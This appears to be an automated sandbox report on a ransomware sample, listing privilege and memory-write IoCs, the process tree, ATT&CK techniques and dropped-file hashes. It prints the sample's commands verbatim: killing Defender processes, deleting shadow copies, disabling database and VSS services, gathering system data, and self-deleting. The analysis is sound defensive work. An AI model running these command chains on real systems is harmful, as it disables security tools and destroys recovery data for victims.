536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	380	taskkill.exe
Token: SeBackupPrivilege	4844	vssvc.exe
Token: SeRestorePrivilege	4844	vssvc.exe
Token: SeAuditPrivilege	4844	vssvc.exe
Token: SeBackupPrivilege	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
Token: SeRestorePrivilege	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
Token: SeManageVolumePrivilege	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
Token: SeTakeOwnershipPrivilege	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
Token: SeIncreaseQuotaPrivilege	4996	WMIC.exe
Token: SeSecurityPrivilege	4996	WMIC.exe
Token: SeTakeOwnershipPrivilege	4996	WMIC.exe
Token: SeLoadDriverPrivilege	4996	WMIC.exe
Token: SeSystemProfilePrivilege	4996	WMIC.exe
Token: SeSystemtimePrivilege	4996	WMIC.exe
Token: SeProfSingleProcessPrivilege	4996	WMIC.exe
Token: SeIncBasePriorityPrivilege	4996	WMIC.exe
Token: SeCreatePagefilePrivilege	4996	WMIC.exe
Token: SeBackupPrivilege	4996	WMIC.exe
Token: SeRestorePrivilege	4996	WMIC.exe
Token: SeShutdownPrivilege	4996	WMIC.exe
Token: SeDebugPrivilege	4996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4996	WMIC.exe
Token: SeRemoteShutdownPrivilege	4996	WMIC.exe
Token: SeUndockPrivilege	4996	WMIC.exe
Token: SeManageVolumePrivilege	4996	WMIC.exe
Token: 33	4996	WMIC.exe
Token: 34	4996	WMIC.exe
Token: 35	4996	WMIC.exe
Token: 36	4996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4996	WMIC.exe
Token: SeSecurityPrivilege	4996	WMIC.exe
Token: SeTakeOwnershipPrivilege	4996	WMIC.exe
Token: SeLoadDriverPrivilege	4996	WMIC.exe
Token: SeSystemProfilePrivilege	4996	WMIC.exe
Token: SeSystemtimePrivilege	4996	WMIC.exe
Token: SeProfSingleProcessPrivilege	4996	WMIC.exe
Token: SeIncBasePriorityPrivilege	4996	WMIC.exe
Token: SeCreatePagefilePrivilege	4996	WMIC.exe
Token: SeBackupPrivilege	4996	WMIC.exe
Token: SeRestorePrivilege	4996	WMIC.exe
Token: SeShutdownPrivilege	4996	WMIC.exe
Token: SeDebugPrivilege	4996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4996	WMIC.exe
Token: SeRemoteShutdownPrivilege	4996	WMIC.exe
Token: SeUndockPrivilege	4996	WMIC.exe
Token: SeManageVolumePrivilege	4996	WMIC.exe
Token: 33	4996	WMIC.exe
Token: 34	4996	WMIC.exe
Token: 35	4996	WMIC.exe
Token: 36	4996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4868	WMIC.exe
Token: SeSecurityPrivilege	4868	WMIC.exe
Token: SeTakeOwnershipPrivilege	4868	WMIC.exe
Token: SeLoadDriverPrivilege	4868	WMIC.exe
Token: SeSystemProfilePrivilege	4868	WMIC.exe
Token: SeSystemtimePrivilege	4868	WMIC.exe
Token: SeProfSingleProcessPrivilege	4868	WMIC.exe
Token: SeIncBasePriorityPrivilege	4868	WMIC.exe
Token: SeCreatePagefilePrivilege	4868	WMIC.exe
Token: SeBackupPrivilege	4868	WMIC.exe
Token: SeRestorePrivilege	4868	WMIC.exe
Token: SeShutdownPrivilege	4868	WMIC.exe
Token: SeDebugPrivilege	4868	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4868	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 536 wrote to memory of 676	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	66
PID 536 wrote to memory of 676	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	66
PID 536 wrote to memory of 676	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	66
PID 676 wrote to memory of 380	676	cmd.exe	68
PID 676 wrote to memory of 380	676	cmd.exe	68
PID 676 wrote to memory of 380	676	cmd.exe	68
PID 536 wrote to memory of 4756	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	70
PID 536 wrote to memory of 4756	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	70
PID 536 wrote to memory of 4756	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	70
PID 4756 wrote to memory of 4708	4756	cmd.exe	72
PID 4756 wrote to memory of 4708	4756	cmd.exe	72
PID 4756 wrote to memory of 4708	4756	cmd.exe	72
PID 536 wrote to memory of 4264	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	74
PID 536 wrote to memory of 4264	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	74
PID 536 wrote to memory of 4264	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	74
PID 536 wrote to memory of 4068	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	76
PID 536 wrote to memory of 4068	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	76
PID 536 wrote to memory of 4068	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	76
PID 4068 wrote to memory of 4996	4068	cmd.exe	78
PID 4068 wrote to memory of 4996	4068	cmd.exe	78
PID 4068 wrote to memory of 4996	4068	cmd.exe	78
PID 536 wrote to memory of 2692	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	79
PID 536 wrote to memory of 2692	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	79
PID 536 wrote to memory of 2692	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	79
PID 536 wrote to memory of 4252	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	81
PID 536 wrote to memory of 4252	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	81
PID 536 wrote to memory of 4252	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	81
PID 4252 wrote to memory of 4868	4252	cmd.exe	83
PID 4252 wrote to memory of 4868	4252	cmd.exe	83
PID 4252 wrote to memory of 4868	4252	cmd.exe	83
PID 536 wrote to memory of 5060	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	84
PID 536 wrote to memory of 5060	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	84
PID 536 wrote to memory of 5060	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	84
PID 536 wrote to memory of 3732	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	86
PID 536 wrote to memory of 3732	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	86
PID 536 wrote to memory of 3732	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	86
PID 3732 wrote to memory of 4332	3732	cmd.exe	88
PID 3732 wrote to memory of 4332	3732	cmd.exe	88
PID 3732 wrote to memory of 4332	3732	cmd.exe	88
PID 536 wrote to memory of 4208	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	89
PID 536 wrote to memory of 4208	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	89
PID 536 wrote to memory of 4208	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	89
PID 536 wrote to memory of 4916	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	91
PID 536 wrote to memory of 4916	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	91
PID 536 wrote to memory of 4916	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	91
PID 4916 wrote to memory of 4344	4916	cmd.exe	93
PID 4916 wrote to memory of 4344	4916	cmd.exe	93
PID 4916 wrote to memory of 4344	4916	cmd.exe	93
PID 536 wrote to memory of 3872	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	94
PID 536 wrote to memory of 3872	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	94
PID 536 wrote to memory of 3872	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	94
PID 536 wrote to memory of 400	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	96
PID 536 wrote to memory of 400	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	96
PID 536 wrote to memory of 400	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	96
PID 400 wrote to memory of 4348	400	cmd.exe	98
PID 400 wrote to memory of 4348	400	cmd.exe	98
PID 400 wrote to memory of 4348	400	cmd.exe	98
PID 536 wrote to memory of 4440	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	99
PID 536 wrote to memory of 4440	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	99
PID 536 wrote to memory of 4440	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	99
PID 536 wrote to memory of 4304	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	101
PID 536 wrote to memory of 4304	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	101
PID 536 wrote to memory of 4304	536	7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe	101
PID 4304 wrote to memory of 4284	4304	cmd.exe	103

C:\Users\Admin\AppData\Local\Temp\7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
"C:\Users\Admin\AppData\Local\Temp\7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe"
1⤵
- Modifies extensions of user files
- Windows security modification
- Drops file in Program Files directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:536
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /F /IM MSASCuiL.exe taskkill /F /IM MSMpeng.exe taskkill /F /IM msseces.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:676
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM MSASCuiL.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet sc config browser sc config browser start=enabled sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4756
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo OS INFO: > %TEMP%\PHHDVLWGH"
  2⤵
  PID:4264
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic OS get Caption,CSDVersion,OSArchitecture,Version >> %TEMP%\PHHDVLWGH"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4068
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic OS get Caption,CSDVersion,OSArchitecture,Version
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo BIOS INFO: >> %TEMP%\PHHDVLWGH"
  2⤵
  PID:2692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version >> %TEMP%\PHHDVLWGH"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4252
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4868
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo CPU INFO: >> %TEMP%\PHHDVLWGH"
  2⤵
  PID:5060
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors >> %TEMP%\PHHDVLWGH"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3732
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors
    3⤵
    PID:4332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo MEMPHYSICAL INFO: >> %TEMP%\PHHDVLWGH"
  2⤵
  PID:4208
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic MEMPHYSICAL get MaxCapacity >> %TEMP%\PHHDVLWGH"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4916
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic MEMPHYSICAL get MaxCapacity
    3⤵
    PID:4344
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo MEMORYCHIP: INFO >> %TEMP%\PHHDVLWGH"
  2⤵
  PID:3872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag >> %TEMP%\PHHDVLWGH"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:400
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag
    3⤵
    PID:4348
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo NIC INFO: >> %TEMP%\PHHDVLWGH"
  2⤵
  PID:4440
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic NIC get Description, MACAddress, NetEnabled, Speed >> %TEMP%\PHHDVLWGH"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4304
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic NIC get Description, MACAddress, NetEnabled, Speed
    3⤵
    PID:4284
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo DISKDRIVE INFO: >> %TEMP%\PHHDVLWGH"
  2⤵
  PID:4300
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic DISKDRIVE get InterfaceType, Name, Size, Status >> %TEMP%\PHHDVLWGH"
  2⤵
  PID:4012
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic DISKDRIVE get InterfaceType, Name, Size, Status
    3⤵
    PID:4624
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo USERACCOUNT INFO: >> %TEMP%\PHHDVLWGH"
  2⤵
  PID:4600
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic USERACCOUNT get Caption, Name, PasswordRequired, Status >> %TEMP%\PHHDVLWGH"
  2⤵
  PID:4504
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic USERACCOUNT get Caption, Name, PasswordRequired, Status
    3⤵
    PID:4428
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo IPCONFIG: >> %TEMP%\PHHDVLWGH"
  2⤵
  PID:4656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "ipconfig >> %TEMP%\PHHDVLWGH"
  2⤵
  PID:3112
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo DATABASES FILES: >> %TEMP%\PHHDVLWGH"
  2⤵
  PID:2352
- C:\Windows\SysWOW64\notepad.exe
  notepad.exe C:\Users\Admin\AppData\Local\Temp\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:5040
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe"
  2⤵
  PID:3540
- - C:\Windows\SysWOW64\PING.EXE
    ping 1.1.1.1 -n 1 -w 3000
    3⤵
    - Runs ping.exe
    PID:4032

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4844

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
11B

MD5
887ae0db192785398c154a027c858317

SHA1
9e1258a3444e7f54d4a2b23bec0c020d67f285b6

SHA256
9841fc54844c86d073907913cfd2fccc49d13db491e790c6aeb30b7159e62bf5

SHA512
65364e8797ecc23d9eac18cfe0c1393e9429ee15cde33b7b936c917608196da7bf53ba7c21d9bb637c9a91797eb58a4dbb2346dc4bd9e6c947a711b381dfcb76

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
283B

MD5
5f0d61cfa68f185b2169a318e2491b6f

SHA1
8399acb9cc0bf68fd39d72e1e9af82a0317e5ab2

SHA256
3147b7ea1dfe3e42b5c8016a9506aac607ba3f9be642234f75496e34358a8ee0

SHA512
4b0f15bc292fd512607372f2ffe20f2ab23d22f5da3db96da574aed0c4771cd9e375f1ca588bb4cc89435c13a20ecc2c43b6937226fa07e285da6779b6020ae7

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
296B

MD5
fe1f5baac0c9c57e000f0b6893756a21

SHA1
9c10748ecaa3905c40c902add707423d73d4ae09

SHA256
6cb0bdecbb75635586f36934b07f790081f4379be12afc40336f8728eebfd9d7

SHA512
b5ebe05e180b70f59a2ead7a901a469259bfed7f422222b6948ad5303951ea053fb4871f4f27f1709145e9e796c40480eb37fba85fa7aea3756fdb6450f8c973

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
668B

MD5
939c9e3c24b2bbfce9481e0f93161314

SHA1
6ae00d847e39b81322b2bd811b404a8eea6f6bbf

SHA256
1ec908abfd3ebc4d6bfbccbe7804967a902dc9f33d86efe01c0d6599c8eb96c8

SHA512
a5dfac17d09dbbd509a0e1384f93e7b918d457d96838b6d6fa1e987f40a299a3033aaa49173f92335b2c69d60796ea6df2e87396e50717eb91f67a9e529d4b25

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
668B

MD5
939c9e3c24b2bbfce9481e0f93161314

SHA1
6ae00d847e39b81322b2bd811b404a8eea6f6bbf

SHA256
1ec908abfd3ebc4d6bfbccbe7804967a902dc9f33d86efe01c0d6599c8eb96c8

SHA512
a5dfac17d09dbbd509a0e1384f93e7b918d457d96838b6d6fa1e987f40a299a3033aaa49173f92335b2c69d60796ea6df2e87396e50717eb91f67a9e529d4b25

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
1KB

MD5
e5063f8c24b17f86f75e7210e31d4ae4

SHA1
92c47a085bf46e0fa8f5c374ce21b6839c9c9bbd

SHA256
cbe64f5f0dc7b2098137d2cf11a535bbfc9806eb94f7289955e1ac5e7db358df

SHA512
eefff9a7f2a1867bd8f38680b08c45b7300b7f60586c55c621004b7baaf61d5662230a2afaf1d51acee165f617952b6c2ff55f7449841ae6af64be37092a7005

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
1KB

MD5
e5063f8c24b17f86f75e7210e31d4ae4

SHA1
92c47a085bf46e0fa8f5c374ce21b6839c9c9bbd

SHA256
cbe64f5f0dc7b2098137d2cf11a535bbfc9806eb94f7289955e1ac5e7db358df

SHA512
eefff9a7f2a1867bd8f38680b08c45b7300b7f60586c55c621004b7baaf61d5662230a2afaf1d51acee165f617952b6c2ff55f7449841ae6af64be37092a7005

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
1KB

MD5
15115f7a7c6cfaa3d543c945eab674e8

SHA1
d48394c27046cd455ac78cec54eaf1d0e33e352c

SHA256
b87d7d297c65e29aea0ecc0c0ea6c986759f43a2f62a9b366ed5606994ab1472

SHA512
43345aeed683bccd97a0d5203b517e7245af0582fb73df1b6806819d796973ecbd4c6b057da84e0a07c47b02446f71176cbfd151a16436ea797ecec71c973b41

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
1KB

MD5
15115f7a7c6cfaa3d543c945eab674e8

SHA1
d48394c27046cd455ac78cec54eaf1d0e33e352c

SHA256
b87d7d297c65e29aea0ecc0c0ea6c986759f43a2f62a9b366ed5606994ab1472

SHA512
43345aeed683bccd97a0d5203b517e7245af0582fb73df1b6806819d796973ecbd4c6b057da84e0a07c47b02446f71176cbfd151a16436ea797ecec71c973b41

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
1KB

MD5
4f2739444101f387b1aa7174bc9b9a48

SHA1
cdbd86b7ecadec8a07495fe68aaf4d20ba555c08

SHA256
180d7908d52e06c5b0c82d0c45ddd103a213070f34890d6281efd5f944b1b05a

SHA512
c56d829d8f405c60872c122f610247aaf3c22f875569a06dd68bd219f93d4bcd1f512b45605efa7d433421da41150aa0ee533d6792b7bc038c2db0fb61c9e314

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
1KB

MD5
4f2739444101f387b1aa7174bc9b9a48

SHA1
cdbd86b7ecadec8a07495fe68aaf4d20ba555c08

SHA256
180d7908d52e06c5b0c82d0c45ddd103a213070f34890d6281efd5f944b1b05a

SHA512
c56d829d8f405c60872c122f610247aaf3c22f875569a06dd68bd219f93d4bcd1f512b45605efa7d433421da41150aa0ee533d6792b7bc038c2db0fb61c9e314

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
1KB

MD5
a57291bc1290d7913f43dc6abd4555dd

SHA1
15023ff2e6f83724093049e83078264a2d7c4d77

SHA256
052c6307187a08bf49d7f070a50d4b414ba83d37b36c46c288e45563dc666703

SHA512
044c7db08d50d2b97ba6630388106b26999d55a82a38eda15c7dffe1ba9f74fe8e37b35b0d369817f5c78031b04a3491df0b9ec8bc550f94c79cedb77ab7a74f

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
1KB

MD5
a57291bc1290d7913f43dc6abd4555dd

SHA1
15023ff2e6f83724093049e83078264a2d7c4d77

SHA256
052c6307187a08bf49d7f070a50d4b414ba83d37b36c46c288e45563dc666703

SHA512
044c7db08d50d2b97ba6630388106b26999d55a82a38eda15c7dffe1ba9f74fe8e37b35b0d369817f5c78031b04a3491df0b9ec8bc550f94c79cedb77ab7a74f

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
2KB

MD5
1f93e0c682a86c90e21a2fe73ed0a397

SHA1
890f790173284cc77cfd1ba93523ac43bcc913af

SHA256
5cf8e6a3f032e6a095c78c37a73454080db0760fa82fd1526e9ee256ae90b537

SHA512
22220b4dc1de2772d8737cc7c3cde664571918e347bd0f8f77417a1e4bad23e1720ca64744b84f0a9a742138e7fc0e9843ed82c0d57e38500e327bc903ea327a

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
2KB

MD5
1f93e0c682a86c90e21a2fe73ed0a397

SHA1
890f790173284cc77cfd1ba93523ac43bcc913af

SHA256
5cf8e6a3f032e6a095c78c37a73454080db0760fa82fd1526e9ee256ae90b537

SHA512
22220b4dc1de2772d8737cc7c3cde664571918e347bd0f8f77417a1e4bad23e1720ca64744b84f0a9a742138e7fc0e9843ed82c0d57e38500e327bc903ea327a

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
2KB

MD5
7d30408adc0bf365002c3e6e5261365d

SHA1
f567d25eae5213bfdd5408129532d96209d93e41

SHA256
27b859adc62b7cf71a8482ed0484f4217ce004b5fcd312bd5694b4c49431dea3

SHA512
5f48e7b124a07cbf9e60484d239438c7b6a64dde6a89889a365ab75fff6583e9ad3348d49f21b3a27887b699a62bf701950453a0edc12a9c14c3e20b5ebecb5c

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
2KB

MD5
7d30408adc0bf365002c3e6e5261365d

SHA1
f567d25eae5213bfdd5408129532d96209d93e41

SHA256
27b859adc62b7cf71a8482ed0484f4217ce004b5fcd312bd5694b4c49431dea3

SHA512
5f48e7b124a07cbf9e60484d239438c7b6a64dde6a89889a365ab75fff6583e9ad3348d49f21b3a27887b699a62bf701950453a0edc12a9c14c3e20b5ebecb5c

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
3KB

MD5
649e633ce4f6bc1830a106ba8d3e2ce5

SHA1
b6daf188ea522c74bfa283c6627071eeca6ffd4b

SHA256
7cb2bda18c7d3884656e8aa05589d878b081750d201e36461d4477827da090dd

SHA512
1d76c2d4edbb2f049eef7f0889768c033d0af972e7675557dfa661f253a36ffb278ed9c25e30f1c35644d4b2e2105f3747b01486eab0c9ae35d163a4d8f3443e

Download Submit
C:\Users\Admin\AppData\Local\Temp\PHHDVLWGH

Filesize
3KB

MD5
a26bca1a844b5ad0c740253cdfd0fc80

SHA1
8baa4f57548a554c54793ae4e252b54339bfb409

SHA256
af55b962947f61d39e6cde0c96ec2d624fe1f2428735ee9b6009bf56e30000ee

SHA512
726c9c2337db72e76c0fbeef57c621f9823c2a211237af08ea3acb68b85f050400349f6a1f5cac16c9263e7c3bab4b17dabceabfe1a089231afb2bb194e43df8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WANNA_RECOVER_KOXIC_FILEZ_NOLUQ.txt

Filesize
3KB

MD5
b781b4e02f0c3ce6f626d40d80d0a387

SHA1
c5da35af873e0130dbffd7d3e42a9f0d91f5bc11

SHA256
b0b670a4289585fbcb751a23f451bb966ac1012280c5e9390d416594f15f2bcc

SHA512
be8b7e8c56f22dda78900bd3291027d48b8b0275e94a4b1f9e4f033d0f350adf3892426ff708e495a31aa6cee21939a7571680652ca328b891928c5c996ef8a7

Download Submit